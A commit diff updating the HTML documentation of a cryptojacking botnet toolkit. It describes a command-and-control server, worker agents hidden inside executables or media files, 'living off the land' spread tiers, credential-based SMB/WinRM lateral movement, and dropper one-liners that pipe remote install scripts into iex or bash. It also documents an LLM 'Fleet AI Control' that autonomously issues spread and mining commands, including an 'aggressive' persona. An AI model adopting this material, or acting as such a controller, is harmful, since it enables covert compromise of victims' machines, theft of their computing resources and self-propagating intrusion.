Update README and documentation for LOTL onion, fleet intelligence, and AI control
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled

This commit is contained in:
AetherForge
2026-06-07 02:47:21 -07:00
parent aaa6fc77a4
commit 95f26a8d08
7 changed files with 242 additions and 28 deletions

View File

@@ -460,6 +460,14 @@ irm https://your.site/install.ps1?pin={build_id}&amp;c=docs | iex</code></pre>
</tr>
</tbody>
</table>
<h4>Triple onion &amp; fleet intelligence</h4>
<p>
Spread tiers above run inside the <strong>triple onion</strong> orchestrator: recon (<code>vuln_recon</code>,
service probes) → policy gates (<code>patch_first</code>, risk score) → deploy lanes → mining execution.
Server-side <strong>adaptive strategy</strong>, <strong>phenotype cloning</strong>, and <strong>failure atlas</strong>
adjust mining tier order and skips; <strong>Fleet AI Control</strong> (Calibrate) can override adaptive when enabled.
Crucible <strong>Access Depth</strong> and <strong>LOTL Timeline</strong> show live progression.
</p>
<h4>Forge steps</h4>
<ol class="spread-steps">
<li>Forge → Operation mode → <strong>LOTL Onion</strong> (or enable <code>lotl_onion_enabled</code> in Advanced).</li>

View File

@@ -34,6 +34,8 @@
<li><a href="#build-manager">Build Manager</a></li>
<li><a href="#dashboard">Fleet &amp; Crucible</a></li>
<li><a href="#crucible-ops">Crucible Commands</a></li>
<li><a href="#lotl-timeline">LOTL Timeline</a></li>
<li><a href="#fleet-intelligence">Fleet Intelligence</a></li>
<li><a href="#spread-campaigns">Emberwake &amp; Campaigns</a></li>
<li><a href="SPREAD_TECHNIQUES.html">Spread Techniques</a></li>
<li><a href="#wordpress-plugin-supply-chain">WordPress plugin</a></li>
@@ -84,7 +86,7 @@
<tbody>
<tr><td>Control server</td><td>Go backend — REST API, WebSocket hub, SQLite DB, Stratum proxy</td></tr>
<tr><td>Command deck</td><td>React/Vite SPA — login gate, fleet map, forge, Crucible, calibrate</td></tr>
<tr><td>Worker agent</td><td>Windows / Linux / macOS binary — RandomX + optional KawPoW, telemetry, spread</td></tr>
<tr><td>Worker agent</td><td>Windows / Linux / macOS / Android APK — RandomX + optional KawPoW, telemetry, spread</td></tr>
<tr><td>Fusion</td><td>Prep or movie bundler — hides worker inside your exe or encrypted media package</td></tr>
<tr><td>Forge pipeline</td><td>Compile-time config — threads, stealth, firewall, USB/LAN spread flags</td></tr>
</tbody>
@@ -197,7 +199,8 @@ bin\miner-server.exe -port 8989 -data .\data</code></pre>
<tbody>
<tr><td><code>/dashboard</code></td><td>Command Deck</td><td>Fleet health, hashrate, topology map, install funnel, audit strip</td></tr>
<tr><td><code>/agents</code></td><td>Fleet Roster</td><td>Per-machine detail, remote actions, groups, protocol tunnels</td></tr>
<tr><td><code>/crucible</code></td><td>Crucible</td><td>Batch remote terminal, expanded ops, file manager, gold rain overlay</td></tr>
<tr><td><code>/crucible</code></td><td>Crucible</td><td>Batch terminal, Access Depth, heat map, Probe &amp; Join, spread graphs</td></tr>
<tr><td><code>/lotl-timeline</code></td><td>Onion</td><td>Live 14-tier LOTL progression, AI decisions, court sessions (<code>/onion</code> redirects)</td></tr>
<tr><td><code>/forge</code></td><td>Forge</td><td>Full builder — preflight, fusion, blueprints, operation modes</td></tr>
<tr><td><code>/mission-deck</code></td><td>Mission Deck</td><td>Fast path — preset loadout → one-click forge + export + clipboard links</td></tr>
<tr><td><code>/builds</code></td><td>Builds</td><td>Download, pin, public toggle, dropper one-liners, re-forge</td></tr>
@@ -252,19 +255,58 @@ bin\miner-server.exe -port 8989 -data .\data</code></pre>
or preset tactical ops; output streams to the terminal in real time. Gold rain overlay activates when a single
agent is selected. Tabs: <strong>Ops</strong>, <strong>Recon</strong>, <strong>Files</strong> (File Manager),
<strong>Spread</strong>, <strong>Tunnels</strong>. Full command reference:
<a href="#crucible-ops">Crucible Commands</a>.
<a href="#crucible-ops">Crucible Commands</a>. <code>/agents</code> redirects here.
</p>
<ul>
<li><strong>Heat map</strong> — sidebar colors nodes by hashrate; spike flash on H/s jumps; toggle topo view for subnet clusters</li>
<li><strong>Access Depth</strong> — single-node panel: spread + mining onion, <code>lotl_attempts</code>, adaptive Strategy reasoning, phenotype clone badge, clearance L0L4, <code>join_lane</code>, atlas skips</li>
<li><strong>Probe &amp; Join</strong><code>discover_and_join</code>: service discovery → signed deploy plan → best LOTL lane</li>
<li><strong>Spread tab</strong> — credential graph (<code>cred_edges</code>), service graph summary, spread template export (WinRM, Linux LOTL, GPO, Intune)</li>
</ul>
<p>
<strong>File Manager</strong> (single online node): <code>list_dir</code>, <code>read_file</code> (512 KB cap),
upload, download, path breadcrumbs — cross-platform. Requires online WebSocket (not beacon-only).
</p>
<h3 id="lotl-timeline">LOTL Timeline (Onion)</h3>
<p>
Route <code>/lotl-timeline</code> (nav label <strong>Onion</strong>; legacy <code>/onion</code> redirects).
Per-agent live view of the 14-tier spread chain, mining execution tiers, fleet progress bars, AI decision
history (when AI Control enabled), Singular Machine Court sessions, clearance elevation log, and phenotype
&quot;cloned from&quot; badges. Links back to Crucible Access Depth for the selected node.
</p>
<p>
Full tier glossary: <a href="SPREAD_TECHNIQUES.html#lotl-onion">Spread Techniques → LOTL Onion</a> ·
repo <code>tests/README.md</code> § LOTL vector glossary.
</p>
<h3 id="fleet-intelligence">Fleet intelligence</h3>
<p>
Server-side learning for <strong>your fleet only</strong> — not third-party telemetry.
</p>
<table class="wiki-table">
<thead><tr><th>Feature</th><th>What it does</th></tr></thead>
<tbody>
<tr><td>Adaptive strategy</td><td>Personalized mining <code>tier_order</code> + <code>strategy_reasoning[]</code> from OS/Docker/WSL probes and outcomes; Calibrate <code>adaptive_strategy_enabled</code> (default on); <code>POST /api/v1/strategy/recompute</code></td></tr>
<tr><td>Phenotype cloning</td><td>Winning spread+mining path published by fingerprint; siblings inherit on auth without re-forge</td></tr>
<tr><td>Failure atlas</td><td>After repeated failures under a condition, hard-skips subtree tiers; merged into adaptive skips</td></tr>
<tr><td>Singular Machine Court</td><td>When AI Control on + host stuck: prosecutor/defender/judge LLM session → commands</td></tr>
<tr><td>Clearance L0L4</td><td>Session gating for remote actions; optional auto-elevate to L4 when stuck</td></tr>
</tbody>
</table>
<p><strong>Precedence:</strong> phenotype inherit &gt; Fleet AI Control (when on) &gt; adaptive strategy &gt; Calibrate defaults. <code>patch_first</code> and risk gates always apply.</p>
<h3>Emberwake</h3>
<p>
Dashboard tab at <code>/emberwake</code> — campaign link builder, A/B <code>?pin=</code> rotation,
spread-kit export, shared operator notes (WebSocket sync). Copies one-liners for
<code>curl|bash</code>, <code>irm|iex</code>, and public download URLs with <code>?c=</code> campaign tags.
</p>
<p>
<strong>War Room</strong> — funnel, table, and constellation views with hashrate heat normalization.
Live agent rows show <code>join_lane</code> badges (last successful Probe &amp; Join lane:
<code>do_peer</code>, <code>dns_txt</code>, <code>winrm</code>, etc.).
</p>
<h3>Path Tracer</h3>
<p>
@@ -1005,6 +1047,7 @@ go run ./cmd/mine-validate -seconds 20 -threads 2</code></pre>
<tr><td>Install base</td><td>%LOCALAPPDATA%</td><td>XDG data home</td><td>~/Library/Application Support</td></tr>
<tr><td>HTTPS beacon fallback</td><td><span class="wiki-status working">Working</span></td><td><span class="wiki-status working">Working</span></td><td><span class="wiki-status working">Working</span></td></tr>
<tr><td>Docker E2E agent</td><td></td><td><span class="wiki-status working">Working</span> — see <code>docker/README.md</code></td><td></td></tr>
<tr><td>Android APK fleet node</td><td></td><td></td><td><span class="wiki-status working">Working</span> — embed linux/arm64 agent; <code>platform=android</code>; see <code>android/README.md</code></td></tr>
</tbody>
</table>
@@ -1021,7 +1064,7 @@ go run ./cmd/mine-validate -seconds 20 -threads 2</code></pre>
<!-- 8. Alerts & AI -->
<section id="alerts-ai">
<h2>Alerts &amp; AI (Ollama)</h2>
<h2>Alerts &amp; AI</h2>
<p>
Fleet notifications are configured under <strong>Calibrate → Alert Notifications</strong>. Telegram bot token
and chat ID (your user ID from @userinfobot, not the bot's) drive per-event pushes. Optional SMTP email uses
@@ -1042,16 +1085,48 @@ go run ./cmd/mine-validate -seconds 20 -threads 2</code></pre>
</tbody>
</table>
<h3>Ollama AI autonomy</h3>
<h3>Fleet AI Control (Calibrate)</h3>
<p>
<strong>Calibration Control</strong> toggles <code>server.ai_control_enabled</code>. When on, the server
Fleet AI scheduler polls connected agents on <code>ai_decision_interval_sec</code> (default 60s), calls a local
OpenAI-compatible endpoint (<code>ai_endpoint</code>, default <code>http://127.0.0.1:11434/v1</code>),
parses <code>commands[]</code>, and dispatches fleet actions (<code>restart_mining</code>,
<code>discover_and_join</code>, <code>spread_now</code>, etc.). Decisions surface on LOTL Timeline.
Audit: <code>GET /api/v1/ai/decisions?agent_id=</code>.
</p>
<p><strong>Precedence:</strong> when AI Control is on, it <em>replaces</em> adaptive strategy for tier-order
decisions. Phenotype inherit still wins on auth when a sibling fingerprint match exists.</p>
<h3>AI personas</h3>
<table class="wiki-table">
<thead><tr><th>Persona</th><th>Behavior</th></tr></thead>
<tbody>
<tr><td><strong>balanced</strong></td><td>Default mission behavior</td></tr>
<tr><td><strong>aggressive</strong></td><td>Maximize spread + mine; fast tier retries</td></tr>
<tr><td><strong>silent</strong></td><td>Mine quietly; minimal spread noise</td></tr>
<tr><td><strong>passive</strong></td><td>Observe; defer disruptive actions</td></tr>
<tr><td><strong>persuasive</strong></td><td>Spread-first; defer mining escalation</td></tr>
</tbody>
</table>
<h3>Adaptive strategy</h3>
<p>
Separate from Fleet AI: the adaptive engine (<code>server/internal/strategy/</code>) learns mining tier order
from your fleet stats only. Pushes <code>adaptive_strategy</code> on auth with
<code>strategy_reasoning[]</code> bullets. Crucible Access Depth → Strategy tab shows the trace.
Disable via <code>server.adaptive_strategy_enabled</code>. Manual refresh:
<code>POST /api/v1/strategy/recompute</code>.
</p>
<h3>Per-agent Ollama autonomy (Forge)</h3>
<p>
Optional forge flag bakes <strong>AI Autonomy</strong> into workers. Ollama runs on the <strong>control server
PC</strong> (default <code>http://localhost:11434</code>), not on workers. The worker calls C2
<code>/api/v1/agent/decide</code> → server queries Ollama → tool calls execute on the agent (adjust threads,
self-heal, persistence checks). Best combined with self-healing watchdog.
self-heal, persistence checks). Best combined with self-healing watchdog. Re-forge after changing.
</p>
<pre><code>ollama pull llama3.2
# Forge: enable AI Autonomy, set model name (e.g. llama3.2), confirm endpoint
# Re-forge after changing — settings are baked into the binary</code></pre>
# Forge: enable AI Autonomy, set model name (e.g. llama3.2), confirm endpoint</code></pre>
<div class="wiki-callout warn">
Never paste bot tokens in chat or commit them. Store only in <code>data/config.json</code> (gitignored).
</div>
@@ -1099,6 +1174,11 @@ go run ./cmd/mine-validate -seconds 20 -threads 2</code></pre>
<h3>Fleet policy &amp; staged modules</h3>
<ul>
<li><strong>Fleet Policy</strong><code>PUT /api/v1/fleet/policy</code> pushes <code>mining_mode</code>, schedule, <code>max_cpu_usage_pct</code>, optional pool overrides live</li>
<li><strong>LOTL onion tiers</strong><code>server.lotl_onion_tiers</code> (14 spread tiers); agents with <code>lotl_policy_from_server</code> pull order on auth</li>
<li><strong>Triple onion policy</strong><code>patch_first</code>, <code>skip_mining_on_high_risk</code> gates for recon → deploy → mining</li>
<li><strong>Adaptive strategy</strong><code>adaptive_strategy_enabled</code> (default on); mining tier personalization from fleet outcomes</li>
<li><strong>AI Control</strong><code>ai_control_enabled</code>, <code>ai_endpoint</code>, <code>ai_model</code>, <code>ai_persona</code>, <code>ai_decision_interval_sec</code>, <code>ai_auto_elevate_clearance</code></li>
<li><strong>Deployment credentials</strong> — named profiles in <code>config.json</code> + vault files under <code>data/deployment-creds/</code> for SMB/WinRM spread</li>
<li><strong>Staged Modules</strong><code>POST /api/v1/fleet/modules/push</code> queues <code>fetch_module</code> for Crucible Ops / Spread / GPU packs</li>
<li>Manifests in <code>data/modules/*.json</code> — HMAC-signed with fleet secret</li>
</ul>